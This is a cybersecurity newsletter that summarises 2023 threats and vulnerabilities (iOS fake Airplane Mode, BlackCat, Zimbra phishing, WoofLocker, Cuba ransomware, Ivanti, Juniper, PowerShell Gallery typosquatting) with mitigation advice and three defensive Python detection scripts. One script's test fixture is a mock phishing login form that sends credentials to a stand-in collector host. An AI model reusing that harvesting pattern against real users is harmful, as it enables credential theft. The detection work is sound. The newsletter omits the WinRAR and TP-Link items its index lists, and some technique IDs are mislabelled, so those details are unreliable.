CyberWatch

New iOS 16 Exploit Enables Cellular Access Under Fake Airplane Mode, Cuba Ransomware Uses Veeam Exploit Against U.S. Organizations, and TP-Link Smart Bulbs Let Hackers Steal Your WiFi Password

By

Access Point Consulting

At a Glance

Ransomware, Malware & Phishing

  1. New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode
  2. NoFilter Attack: Sneaky Privilege Escalation Method Bypasses Windows Security  
  3. Google Chrome's New Feature Alerts Users About Auto-Removal of Malicious Extensions
  4. New BlackCat Ransomware Variant Adopts Advanced Impacket and RemCom Tools
  5. New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft
  6. WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams
  7. HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack
  8. This Malware Turned Thousands of Hacked Windows and macOS PCs into Proxy Servers
  9. Cuba Ransomware Uses Veeam Exploit Against Critical U.S. Organizations

Vulnerabilities

  1. CISA Warns of Another Exploited Adobe ColdFusion Vulnerability
  2. Ivanti Issues Fix for Critical Vuln in Its Sentry Gateway Technology
  3. Flaws in Juniper Switches and Firewalls Can Be Chained for Remote Code Execution
  4. Microsoft PowerShell Gallery vulnerable to spoofing, supply chain attacks
  5. New WinRAR Vulnerability Could Allow Hackers to Take Control of Your PC  
  6. TP-Link Smart Bulbs Can Let Hackers Steal Your WiFi Password

Ransomware, Malware & Phishing

New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode

Analysis: Cybersecurity researchers from Jamf Threat Labs have uncovered a novel post-exploitation persistence technique on iOS 16 devices that could let attackers keep a foothold on a compromised device without detection. The technique creates a deceptive version of Airplane Mode, the feature that disables a device's wireless communications. The attacker's artificial Airplane Mode deceives the victim into believing the device is offline while in fact cutting internet connectivity only for apps other than the attacker's own. The malicious application therefore keeps its cellular network connection and continues to operate while the victim believes the device is in Airplane Mode.

Access Point recommends the following:

  1. Keep iOS Devices Updated: Ensure that iOS devices are running the latest version of the operating system to benefit from the most recent security patches and updates that address vulnerabilities.
  2. Download Apps from Trusted Sources: Only download and install applications from trusted sources, such as the official App Store. This helps minimize the risk of installing malicious software on your device.
  3. Implement Mobile Device Management (MDM): Consider using MDM solutions to control all applications on devices through a managed app store. This provides organizations with greater control over the apps installed on company-owned devices.
  4. Regularly Review Installed Apps: Periodically review the list of installed applications on your devices, especially within your organization. Detecting unfamiliar or suspicious apps early can help prevent potential security breaches.
  5. User Education: Educate users about the potential risks associated with sophisticated attack techniques. Encourage users to remain vigilant, even when their device appears to be in Airplane Mode, and report any unusual behavior or app activity.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1322 - Modify System Image.
  • T1443 - Spoofing.
  • T1499 - Resource Consumption.
  • T1565 - Data Manipulation.
  • T1566 - Phishing.

NoFilter Attack: Sneaky Privilege Escalation Method Bypasses Windows Security  

Analysis: A novel attack technique, dubbed "NoFilter," has recently been uncovered, exploiting the Windows Filtering Platform (WFP) to achieve privilege escalation in Windows operating systems. NoFilter allows an attacker with admin privileges to escalate their access to the "NT AUTHORITY\SYSTEM" level, which grants them higher privileges within the system. This discovery was presented at the DEF CON security conference and highlights a previously unknown method for privilege escalation.

Access Point recommends the following:

  1. Keep Systems Updated: It's crucial to regularly update your Windows operating system and all software with the latest security patches. Keeping systems up to date helps prevent attackers from exploiting known vulnerabilities.
  2. Implement Least Privilege: Follow the principle of least privilege by limiting user and application access to the minimum necessary for their tasks. This reduces the potential impact of privilege escalation attacks.
  3. Application Whitelisting: Deploy application whitelisting to allow only trusted and authorized applications to run on your system. This can prevent the execution of malicious software.
  4. Robust Security Solutions: Utilize comprehensive security solutions that incorporate behavior-based detection mechanisms. These mechanisms can identify unusual activities and potential privilege escalation attempts.
  5. Regular Audits: Conduct regular audits of your system to identify any unauthorized changes or activities. Early detection can help mitigate the impact of attacks.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1134 - Access Token Manipulation.
  • T1055 - Process Injection.

Google Chrome's New Feature Alerts Users About Auto-Removal of Malicious Extensions

Analysis: Google is introducing a new feature in the upcoming Chrome web browser version (Chrome 117) that will proactively alert users when an installed extension has been removed from the Chrome Web Store. This feature aims to enhance user awareness and security by notifying them when an add-on has been unpublished by a developer, removed due to policy violations, or flagged as malware. Users will have options to review the extension, remove it, or hide the warning. Additionally, Google is working on automatically upgrading HTTP URLs to HTTPS URLs, even when users click on links explicitly stating HTTP, to improve security during web navigation.

Starting from mid-September 2023, Chrome will display a warning when users attempt to download high-risk files over insecure connections, reducing the risk of compromises resulting from malicious code within downloaded files. Google is also considering enabling HTTPS-First Mode by default in Incognito Mode to provide a more secure browsing experience. Users will have the option to manually enable this mode in Chrome's security settings.

Access Point recommends the following:

  1. Keep Chrome Updated: Ensure that your Chrome browser is regularly updated to the latest version to benefit from the latest security enhancements and features.
  2. Cautious Extension Use: Exercise caution when installing browser extensions and only install those from trusted sources. Remove or disable extensions that are no longer available on the Chrome Web Store.
  3. Use HTTPS: Verify that the websites you visit use HTTPS connections to encrypt data transmission and enhance security.
  4. Safe File Downloads: Avoid downloading files from untrusted or suspicious sources. Whenever possible, download files only from secure and reputable websites.
  5. Security Settings: Familiarize yourself with the security settings in Chrome and consider enabling features like HTTPS-First Mode to enhance your browsing security.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1064 - Scripting.
  • T1179 - Hooking.

New BlackCat Ransomware Variant Adopts Advanced Impacket and RemCom Tools

Analysis: Microsoft has reported the discovery of a new variant of the BlackCat ransomware, which includes tools like Impacket and RemCom for lateral movement and remote code execution. This variant of BlackCat has been observed in attacks by a BlackCat affiliate since July 2023.

Here are some key details about this threat:

  • Impacket Tool: This tool is used for credential dumping and remote service execution, allowing the ransomware to spread within target environments.
  • RemCom: RemCom, an open-source alternative to PsExec, is included in the ransomware executable for remote code execution.
  • Hardcoded Compromised Credentials: The ransomware contains hardcoded compromised credentials for lateral movement and further deployment.

BlackCat is known for its continuous evolution and is associated with multiple ransomware attacks. Some ransomware groups are shifting tactics to focus on threatening to leak victims' data online if ransom demands are not met. Additionally, ransomware actors are adopting intermittent encryption techniques to speed up the encryption process and evade security solutions.

Access Point recommends the following:

  1. Regular and Secure Backups: Maintain regular and secure backups of critical data to mitigate the impact of ransomware attacks. Ensure backups are stored in an isolated and secure environment.
  2. Multi-Layered Security: Implement a multi-layered security approach that includes firewalls, endpoint protection, and intrusion detection systems to detect and prevent ransomware attacks.
  3. Patch Management: Keep operating systems and software up to date with the latest security patches to minimize vulnerabilities that ransomware may exploit.
  4. Secure Remote Access: Implement secure remote access practices, such as strong authentication and access controls, to prevent unauthorized entry into your network.
  5. User Education: Educate users about ransomware threats, phishing attacks, and safe online practices to reduce the risk of infection. Phishing remains a common entry point for ransomware attacks.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1486 - Data Encrypted for Impact.
  • T1490 - Inhibit System Recovery.
  • T1053 - Scheduled Task/Job.

New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft

Analysis: A notable social engineering campaign, described as "mass-spreading," has recently come to light. It specifically targets users of the Zimbra Collaboration email server with the primary objective of obtaining their login credentials for subsequent malicious activity. The campaign has been ongoing since April 2023 and has been directed primarily at small and medium-sized businesses and government entities across several countries, including Poland, Ecuador, Mexico, Italy, and Russia.

The campaign is carried out through deceptive emails carrying an attached HTML file designed to resemble a legitimate communication from a Zimbra administrator, which lends the message credibility. When opened, the HTML file presents a Zimbra login page that appears tailored to the recipient's organization, and the victim's email address is pre-filled in the Username field for an extra layer of authenticity. Once the victim enters their credentials, the information is harvested and sent to a server controlled by the attackers via HTTPS POST requests.

What sets this campaign apart is its ability to propagate further. In subsequent waves, the attackers use compromised administrator accounts from previously targeted, legitimate organizations to send phishing emails to additional entities. This raises concerns that administrators initially targeted through phishing may have reused passwords.
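The harvesting page described above has three recognizable traits: a login form with a password field, a form action that posts to a host outside the organization, and a username field pre-filled with the recipient's address. The Python script below, added here as an example and not taken from the newsletter or from the researchers it cites, triages an HTML attachment for those traits so a mail gateway or analyst can flag it before a user opens it. The sample attachment, the organization domain example.org and the collector host collector.placeholder.invalid are constructed placeholders.

```python
"""Triage an HTML e-mail attachment for a credential-harvesting login form.

Added example; not code from the newsletter or the researchers it cites.
It checks the three traits described in the analysis: a form with a
password field, an action that posts outside the organization's domain,
and a username/e-mail field that is already filled in. The sample
attachment and every hostname below are constructed placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormCollector(HTMLParser):
    """Collect each <form> with its action URL and its <input> attributes."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(attrs)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _is_internal(host, org_domain):
    return host == org_domain or host.endswith("." + org_domain)


def analyze_html_attachment(html_text, org_domain):
    """Return one finding per suspicious credential form.

    Each finding is {"action": <form action>, "reasons": [<str>, ...]}.
    Forms without a password field are ignored.
    """
    parser = _FormCollector()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        inputs = form["inputs"]
        types = {(i.get("type") or "text").lower() for i in inputs}
        if "password" not in types:
            continue
        reasons = []
        host = urlparse(form["action"]).hostname or ""
        if host and not _is_internal(host, org_domain):
            reasons.append(f"posts credentials to external host {host}")
        for inp in inputs:
            name = (inp.get("name") or "").lower()
            value = inp.get("value") or ""
            looks_like_user = any(k in name for k in ("user", "mail", "login"))
            if looks_like_user and "@" in value:
                reasons.append(f"username field '{name}' is pre-filled with {value}")
        if reasons:
            findings.append({"action": form["action"], "reasons": reasons})
    return findings


# Constructed sample resembling the lure described above (placeholder hosts).
SAMPLE_ATTACHMENT = """
<html><body>
<h2>Zimbra Web Client</h2>
<form method="POST" action="https://collector.placeholder.invalid/submit.php">
  <input type="text" name="username" value="jane.doe@example.org">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>
"""

if __name__ == "__main__":
    for finding in analyze_html_attachment(SAMPLE_ATTACHMENT, "example.org"):
        print("suspicious form ->", finding["action"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

A form that posts to a relative path or to a host under the organization's own domain produces no finding, so the check does not fire on legitimate webmail pages; the pre-filled address is reported separately because it is the detail that makes the lure convincing and is rarely present in a genuine login page delivered by mail.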

Access Point recommends the following:

  1. Password Hygiene: Encourage employees to establish strong, unique passwords for their various accounts and services. This practice significantly mitigates the risks associated with password reuse.
  2. Email Security Solutions: Deploy robust email security solutions within your organization. These solutions should be capable of detecting and filtering phishing emails, malicious attachments, and suspicious links effectively.
  3. Multi-Factor Authentication (MFA): Implement MFA for email and other sensitive accounts. MFA adds an additional layer of security beyond traditional passwords, making it significantly more challenging for unauthorized individuals to gain access.
  4. Link Verification: Train users to adopt a cautious approach when encountering links and sender addresses in emails. They should be encouraged to hover over links to reveal the actual URL and verify its authenticity before clicking.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1566 - Phishing.
  • T1071 - Application Layer Protocol.

WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams

Analysis: Cybersecurity researchers have recently unveiled an updated version of the WoofLocker toolkit, a sophisticated tool primarily used for conducting tech support scams. First discovered by Malwarebytes in January 2020, WoofLocker employs JavaScript, embedded within compromised websites, to carry out anti-bot checks and traffic filtering.

One of its noteworthy features is the utilization of JavaScript that redirects unsuspecting users to browlock (browser locker) pages. To obscure its malicious intent, the toolkit employs steganographic techniques to hide JavaScript code within a PNG image. The ultimate goal is to redirect users to fraudulent call centers, where they are deceived into seeking assistance for non-existent computer issues, potentially resulting in financial losses due to the purchase of fake security solutions.

Although the campaign's tactics and techniques have largely remained consistent, its infrastructure has evolved to withstand takedown efforts. To enhance its resilience, WoofLocker now primarily targets users who visit compromised adult websites, utilizing hosting providers located in Bulgaria and Ukraine.
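Because the toolkit hides its JavaScript inside a PNG, one defensive check is to inspect the PNG container rather than the pixels: text chunks, non-standard chunk types, chunks whose CRC no longer matches, and bytes appended after the IEND chunk are the places where foreign data most easily lands without breaking the image. The Python scanner below is an added example, not code from the newsletter or from Malwarebytes; it relies only on the public PNG chunk layout, and the image it inspects is built in code as a constructed sample.

```python
"""Scan a PNG container for places where script text can hide.

Added example; not code from the newsletter or from Malwarebytes. It
inspects only the public PNG chunk layout (no pixel-level steganalysis):
text chunks, non-standard chunk types, bad CRCs and bytes appended after
IEND. The image it scans is constructed in code below.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tEXt", b"zTXt", b"iTXt", b"gAMA",
    b"cHRM", b"sRGB", b"iCCP", b"pHYs", b"tIME", b"bKGD", b"tRNS", b"sBIT",
}
SCRIPT_MARKERS = (b"<script", b"eval(", b"document.", b"window.location")


def png_chunks(data):
    """Return ([(type, payload, crc_ok), ...], trailing_bytes_after_IEND)."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        crc_ok = (len(crc_bytes) == 4
                  and struct.unpack(">I", crc_bytes)[0] == zlib.crc32(ctype + payload))
        chunks.append((ctype, payload, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def _chunk_text(ctype, payload):
    """Extract the readable part of a text chunk (zTXt is decompressed)."""
    if ctype == b"zTXt":
        try:
            # layout: keyword NUL compression-method compressed-text
            return zlib.decompress(payload.split(b"\x00", 1)[1][1:])
        except (IndexError, zlib.error):
            return payload
    return payload


def scan_png(data):
    """Return a list of human-readable findings; [] means nothing suspicious."""
    chunks, trailing = png_chunks(data)
    findings = []
    for ctype, payload, crc_ok in chunks:
        name = ctype.decode("latin-1")
        if not crc_ok:
            findings.append(f"{name}: CRC mismatch (chunk rewritten or corrupted)")
        if ctype not in STANDARD_CHUNKS:
            findings.append(f"{name}: non-standard chunk carrying {len(payload)} bytes")
        text = _chunk_text(ctype, payload).lower()
        if any(marker in text for marker in SCRIPT_MARKERS):
            findings.append(f"{name}: payload contains script-like text")
    if trailing:
        findings.append(f"{len(trailing)} bytes appended after IEND")
    return findings


def _chunk(ctype, payload):
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload)))


def build_sample_png(with_hidden_data=True):
    """Build a constructed 1x1 grayscale PNG, optionally with hidden data."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")          # filter byte + one pixel
    png = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    if with_hidden_data:
        png += _chunk(b"tEXt", b"Comment\x00<script>/* placeholder */</script>")
    png += _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    if with_hidden_data:
        png += b"trailing bytes that a viewer never reads"
    return png


if __name__ == "__main__":
    for line in scan_png(build_sample_png()) or ["clean"]:
        print(line)
```

The scanner deliberately stops at container structure: data hidden in the pixel values themselves (true steganography) passes it, so treat a clean result as "no crude hiding found", and treat any finding on an image served from a third-party host as reason to block the script that fetched it.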

Access Point recommends the following:

  1. Ad Blockers: Organizations are advised to employ ad blockers as part of their cybersecurity strategy to reduce exposure to potentially malicious advertisements on websites.
  2. Website Scanning: Regularly scan websites, especially if you own or manage one, to detect potential compromises and vulnerabilities.
  3. Security Software Updates: Keep your security software up to date to ensure protection against threats like browser lockers and tech support scams.
  4. User Education: Educate users about the risks associated with tech support scams and the importance of not trusting unsolicited assistance offers.
  5. Browser Security: Maintain up-to-date web browsers and configure their security settings to limit exposure to malicious scripts and techniques.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1566 - Phishing.
  • T1105 - Ingress Tool Transfer.
  • T1059 - Command and Scripting Interpreter.

HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack

Analysis: The threat actors behind the HiatusRAT malware have made a bold return to the cyber landscape after a period of inactivity. These malicious actors have resumed their operations, engaging in a new wave of reconnaissance and targeting activities, with a focus on organizations in Taiwan and a U.S. military procurement system. Their tenacity and determination are evident, and their identity and origin remain shrouded in mystery.

Recent targets include semiconductor and chemical manufacturers, a municipal government organization in Taiwan, and a U.S. Department of Defense (DoD) server associated with defense contracts. The HiatusRAT malware, which was first disclosed in March 2023, initially targeted business-grade routers to clandestinely spy on victims in Latin America and Europe. In this latest series of attacks, which occurred between mid-June and August 2023, HiatusRAT employed pre-built binaries designed for different architectures. The threat actors primarily honed in on Ruckus-manufactured edge devices in Taiwan.

The infrastructure underpinning HiatusRAT comprises payload and reconnaissance servers that communicate directly with victim networks. These servers are operated and managed via Tier 1 and Tier 2 servers. In the case of the DoD server, the attackers used two IP addresses to establish connections, transferring an estimated 11 MB of bi-directional data over approximately two hours. While the precise motive remains unclear, it is suspected that the threat actors were seeking publicly available information related to military contracts for potential future targeting.

Access Point recommends the following:

  1. Device Updates and Patching: Regularly update and patch all devices, especially critical perimeter assets like routers and firewalls.
  2. Network Monitoring: Implement robust network monitoring capabilities to detect and respond promptly to suspicious activities and unauthorized access.
  3. User Education: Educate users about the risks associated with opening attachments, clicking on links, and practicing good cybersecurity hygiene.
  4. Supply Chain Security: Ensure that vendors and suppliers adhere to proper security practices to prevent supply chain attacks.
  5. Incident Response: Develop and maintain a comprehensive incident response plan to handle security incidents effectively.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1566 - Phishing.
  • T1105 - Ingress Tool Transfer.  
  • T1059 - Command and Scripting Interpreter.
  • T1498 - Network Denial of Service.
  • T1036 - Masquerading.

This Malware Turned Thousands of Hacked Windows and macOS PCs into Proxy Servers

Analysis: Threat actors are taking advantage of malware-infected Windows and macOS devices to distribute a proxy server application. This application transforms these compromised machines into proxy exit nodes, rerouting proxy requests through them. While the proxy service claims to rely on informed and consenting users, there's evidence that malware writers are surreptitiously installing the proxy on infected systems.

Operated by an unnamed company, this proxy service manages a vast network of over 400,000 proxy exit nodes. Some of these nodes appear to be hijacked by malware on infected devices. The proxy software, developed in the Go programming language, targets both Windows and macOS systems. To avoid detection, Windows versions use a valid digital signature.

Malware spreads this proxy software by luring users searching for cracked software and games. Once installed, the proxy collects information about the compromised systems, including running processes, CPU and memory usage, and battery status. Furthermore, the proxy installation often comes bundled with additional malware or adware components, adding complexity to the situation.

This tactic highlights a growing trend in malware campaigns using proxy applications for unauthorized financial gains. It also underscores the increasing focus on macOS systems by threat actors, evident in the rise of information stealers and sophisticated macOS tools since 2019.

Access Point recommends the following:

  1. Avoid Untrusted Sources: Refrain from downloading cracked software, games, or unauthorized content from untrusted sources, as these often serve as vehicles for malware.
  2. Regular Scans: Perform regular antivirus and antimalware scans to detect and remove malicious software.
  3. Keep Software Updated: Keep your operating system and applications up to date with the latest security patches.
  4. Exercise Caution: Be cautious while browsing, avoid clicking on suspicious links, and refrain from downloading files from untrusted websites.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1566 - Phishing.
  • T1059 - Command and Scripting Interpreter.
  • T1044 - Windows Management Instrumentation.
  • T1055 - Process Injection.
  • T1497 - Virtualization/Sandbox Evasion.

Cuba Ransomware Uses Veeam Exploit Against Critical U.S. Organizations

Analysis: The Cuba ransomware gang has recently been detected targeting critical infrastructure organizations in the United States and IT firms in Latin America. This group's attack tactics blend old and new tools, showcasing their evolving and persistent threat to cybersecurity.

BlackBerry's Threat Research and Intelligence team first identified this campaign in early June 2023. Cuba has now incorporated exploitation of CVE-2023-27532 to steal credentials from configuration files. Rather than brute-forcing, the group gains entry with compromised admin credentials over Remote Desktop Protocol (RDP). Its custom downloader, "BugHatch," communicates with a command and control (C2) server to download DLL files or execute commands. To disable endpoint protection tools, the group uses the "Bring Your Own Vulnerable Driver" (BYOVD) technique and relies on the "BurntCigar" tool to terminate kernel processes linked to security products.

Beyond CVE-2023-27532, Cuba exploits CVE-2020-1472, also known as "Zerologon," to achieve privilege escalation against Active Directory domain controllers. Their post-exploitation phase involves the use of Cobalt Strike beacons and various "living off the land binaries" (LOLBins). While the group's origins remain uncertain, linguistic clues, targeting patterns, and infrastructure indicators suggest Russian ties. The Cuba ransomware gang primarily seeks financial gain.

The persistent threat from this group underscores the importance of timely security updates and patches, especially when proof-of-concept exploits are publicly available.

Access Point recommends the following:

  1. Patch Promptly: Ensure swift application of security updates and patches to all software and systems to mitigate the risk of known vulnerabilities being exploited.
  2. Strong Authentication: Implement strong authentication mechanisms, including two-factor authentication (2FA) and multi-factor authentication (MFA) for remote access.
  3. Network Segmentation: Employ proper network segmentation to restrict lateral movement in case of a breach.
  4. Security Monitoring: Utilize robust security monitoring to detect and respond to unusual or suspicious activities within the network.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1190 - Exploit Public-Facing Application.
  • T1021 - Remote Services.
  • T1055 - Process Injection.
  • T1105 - Remote File Copy.
  • T1053 - Scheduled Task/Job.
  • T1117 - Regsvcs/Regasm.

Vulnerabilities

CISA Warns of Another Exploited Adobe ColdFusion Vulnerability

Analysis: The US Cybersecurity and Infrastructure Security Agency (CISA) has raised an alert regarding an exploited vulnerability in Adobe ColdFusion, labeled as CVE-2023-26359. This flaw, which was addressed by Adobe in their March 2023 Patch Tuesday updates, is categorized as a critical data deserialization issue, potentially allowing for arbitrary code execution. CISA has incorporated this vulnerability into its Known Exploited Vulnerabilities (KEV) Catalog and emphasizes the substantial risks it presents. In response, the agency has directed government entities to rectify this vulnerability by September 11, adhering to the Binding Operational Directive (BOD) 22-01, which mandates addressing known exploited vulnerabilities. Notably, the KEV catalog lists 12 ColdFusion vulnerabilities, with four being identified this year, and some have been utilized in combination during cyberattacks. Although specific details regarding attacks exploiting CVE-2023-26359 remain undisclosed, past incidents have shown that Adobe ColdFusion vulnerabilities attract various threat actors.

Access Point recommends the following:

  1. Priority Patching: Organizations, especially government entities, should prioritize patching the vulnerability CVE-2023-26359 in Adobe ColdFusion. It is essential to adhere to CISA's directive, which sets a deadline of September 11 for addressing this specific vulnerability.
  2. Heightened Vigilance: Given the historical pattern of Adobe ColdFusion vulnerabilities being exploited by various threat actors, it is imperative for all organizations to maintain a high level of vigilance.
  3. Regular System Review: Organizations should regularly review and update their systems to ensure they are equipped with the latest security patches.

Ivanti Issues Fix for Critical Vuln in Its Sentry Gateway Technology

Analysis: Ivanti has released a security patch for a critical zero-day vulnerability in its Sentry security gateway product, identified as CVE-2023-38035. The flaw, with a severity rating of 9.8 out of 10, lies in the interface administrators use to configure security policies. If exploited, attackers could bypass authentication controls and potentially access sensitive APIs, change the gateway's configuration, execute system commands, and write arbitrary files on the system. The issue affects all supported Sentry versions, including 9.18, 9.17, and 9.16, as well as older, unsupported releases. The vendor emphasized that organizations that do not expose port 8443 to the internet face minimal risk. Some reports indicate that attackers are already exploiting this vulnerability.

Ivanti Sentry, previously known as MobileIron Sentry, forms a part of Ivanti's Unified Endpoint Management products portfolio. The gateway technology manages, encrypts, and protects traffic between mobile devices and backend systems. It primarily functions as a gatekeeper for an organization's Microsoft Exchange Server, ActiveSync server, or other backend systems like SharePoint server. Ivanti Sentry can also act as a Kerberos Key Distribution Center Proxy (KKDCP) server. This technology has gained traction in many businesses to ensure secure access for remote workers using personal and company-issued mobile devices. Recently, attackers exploited another vulnerability in Ivanti Endpoint Manager, CVE-2023-35078, compromising systems of 12 Norwegian government agencies. Additionally, a separate bug, CVE-2023-32560, was found in Ivanti's Avalanche mobile management technology.

Ivanti acted promptly after CVE-2023-38035 was reported by security vendor mnemonic. It has prepared RedHat Package Manager (RPM) scripts tailored to each supported version to address the vulnerability and cautions organizations to apply the RPM script that matches their Sentry version: applying the wrong script may fail to fix the vulnerability and could also destabilize the system.

Access Point recommends the following:

  1. Patch Application: Organizations using Ivanti Sentry security gateway products, especially versions 9.18, 9.17, and 9.16, should promptly apply the security patch released by Ivanti to address the critical zero-day vulnerability (CVE-2023-38035).
  2. Access Restriction: To enhance security, it is imperative to restrict access to the administrator portal exclusively to internal management networks. Specifically, avoid exposing port 8443 to the internet.
  3. Script Selection: When applying the provided RedHat Package Manager (RPM) scripts, organizations must ensure they choose the appropriate script corresponding to their Sentry version. This step is crucial to prevent system instability or ineffective remediation.

Flaws in Juniper Switches and Firewalls Can Be Chained for Remote Code Execution

Analysis: Juniper Networks, the networking appliance manufacturer, has issued patches for four vulnerabilities in the J-Web interface of Junos OS. Designated CVE-2023-36844 through CVE-2023-36847, each is rated 'medium' severity individually, but chained together they reach 'critical' severity. The first two, CVE-2023-36844 and CVE-2023-36845, are PHP external variable modification issues that may let unauthenticated remote attackers alter environment variables, compromising the system's integrity. The second pair, CVE-2023-36846 and CVE-2023-36847, are missing-authentication flaws that allow attackers to upload arbitrary files, affecting the system's file integrity. Juniper advises either disabling the J-Web interface or restricting access to trusted hosts.

These identified vulnerabilities predominantly affect the SRX series firewalls and EX series switches that operate on specific Junos OS versions. Consequently, users of the SRX and EX series are encouraged to promptly upgrade to the most recent Junos OS versions. While Juniper hasn't reported any active exploitation of these vulnerabilities, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has cautioned that if exploited, these vulnerabilities might trigger denial-of-service (DoS) conditions.

Access Point recommends the following:

  1. Patch Application: Organizations utilizing Juniper Networks' SRX series firewalls and EX series switches should urgently apply the patches released by Juniper for the four vulnerabilities identified in the J-Web interface of Junos OS. These patches are essential to mitigate potential risks effectively.
  2. Access Restriction: As a preventive measure, businesses can either disable the J-Web interface if it is not necessary for their operations, or restrict its access solely to trusted hosts. This reduces the attack surface and enhances security.
  3. OS Upgrade: Ensuring that devices are upgraded to the latest Junos OS versions can further enhance security by incorporating the latest fixes and improvements.

Given the potential severity of these vulnerabilities, it is crucial for organizations to take immediate action, even if no active exploits have been reported as of now. By following these recommendations, organizations can effectively safeguard their network infrastructure.

Microsoft PowerShell Gallery vulnerable to spoofing, supply chain attacks

Analysis: Microsoft's PowerShell Gallery, a prominent code repository hosting numerous scripts and modules, has come under scrutiny for lax naming rules that facilitate typosquatting attacks, in which malicious actors spoof popular packages and open the way to supply chain attacks. AquaSec's Nautilus team showed that users can upload packages with names almost identical to existing ones on the Gallery; for example, the "AzTable" module could be mirrored as 'Az.Table'. The problem is compounded by the ability to mimic module details such as Author and Copyright. The team also identified a second flaw that exposes unlisted packages, which the Gallery's search engine normally does not index: an XML file was found that enumerates both listed and unlisted packages, giving an open gateway to the entire PowerShell package database and access to potentially sensitive data within the unlisted packages.

Despite AquaSec reporting these vulnerabilities in September 2022, as of August 16, 2023, the issues remained unresolved. Microsoft initially responded in early November 2022, asserting that they had addressed the problems. However, subsequent testing by AquaSec in December 2022 showed that the vulnerabilities could still be exploited. By January 15, 2023, Microsoft shared that they had put a temporary solution in place while working on a more permanent fix, particularly for the name typosquatting and package detail spoofing problems. Microsoft emphasized that the report's concerns largely depend on social engineering for success. They've implemented some changes to identify and remove suspicious packages and urged users to report any dubious modules.
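A consumer-side check for the naming problem described above is to compare every module a build or admin script is about to install against an allowlist of modules the organization has actually vetted, ignoring the separators and case a squatter can toggle and tolerating a one-character edit. The Python function below is an added example, not AquaSec's or Microsoft's code; the trusted list is a constructed allowlist, and only the AzTable / Az.Table pair comes from the analysis above.

```python
"""Flag module names that imitate a trusted module (typosquatting check).

Added example; not AquaSec's or Microsoft's code. A name is flagged if it
equals a trusted name once separators and case are ignored, or if it is
within a small edit distance of one. The trusted list is a constructed
allowlist; only AzTable / Az.Table are taken from the analysis above.
"""

SEPARATORS = ".-_ "


def normalize(name):
    """Lower-case the name and strip the separators a squatter can toggle."""
    return "".join(ch for ch in name.lower() if ch not in SEPARATORS)


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def check_module_name(candidate, trusted_names, max_distance=1):
    """Return [] for an exact trusted name, else a list of (trusted, reason)
    for every trusted module the candidate imitates."""
    if candidate in trusted_names:
        return []
    norm = normalize(candidate)
    hits = []
    for trusted in trusted_names:
        tnorm = normalize(trusted)
        if norm == tnorm:
            hits.append((trusted, "identical once separators and case are ignored"))
        elif levenshtein(norm, tnorm) <= max_distance:
            hits.append((trusted, f"within edit distance {max_distance}"))
    return hits


# Constructed allowlist: the modules an organization has actually vetted.
TRUSTED_MODULES = ["AzTable", "Az.Accounts", "PSReadLine"]

if __name__ == "__main__":
    for name in ["AzTable", "Az.Table", "PSReadLlne", "Pester"]:
        hits = check_module_name(name, TRUSTED_MODULES)
        status = "ok" if not hits else "; ".join(f"imitates {t}: {r}" for t, r in hits)
        print(f"{name:12} {status}")
```

Because Author and Copyright metadata can be copied, a lookalike whose metadata matches the trusted module is not evidence of legitimacy; the name check above should gate installation, and the allowlist itself belongs in the private repository recommended below so that installs never resolve names against the public Gallery.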

Access Point recommends the following:

  1. Execute Only Signed Scripts: Execute only PowerShell scripts that are digitally signed. Digital signatures provide a level of assurance that the script has not been tampered with and comes from a trusted source.
  2. Utilize Dependable Private Repositories: Consider using private PowerShell repositories where you have control over the modules and scripts that are available. This reduces the risk of inadvertently downloading malicious code.
